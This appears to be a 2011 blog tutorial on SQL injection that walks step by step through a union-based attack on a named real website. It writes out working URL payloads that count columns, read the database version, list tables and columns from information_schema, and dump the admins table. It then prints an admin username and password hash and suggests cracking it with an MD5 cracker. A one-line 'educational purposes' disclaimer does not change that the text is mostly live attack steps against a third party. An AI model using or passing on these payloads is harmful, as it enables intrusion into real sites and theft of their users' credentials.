It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--

that mean it only has 5 columns .. because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--

like that ..

there sould be number pop up somewhere

we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5

5.0.67

ok now ..

let get the table names.. to do that u need to use this commands

group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--

we have the list of table here now

ok .. now we got this tables

http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

Admins

,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,
forum_c,gbook,

infopages,

jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,
users,ok we have the admin table here ..ok lets get the columns now .. to do that just chnage this
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

to
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

Now we have the columns

id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,
topic,author,id,ip,

date,id,title,

alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,
what,date,wid,name,

mail,title,

text,ip,

id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,

now lets put this togeter !!

Table : admins
Columns : id,nick,pass,

In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3

union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .
This Tutorial Is Only For Educational Purposes.
So Friends that all for this tutorial
Username : MaTySeK,

Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253
 

© 2011 Web Chiller - Designed by Surender and Ramesh | ToS | Privacy Policy | Sitemap

About Us | Contact Us | Write For Us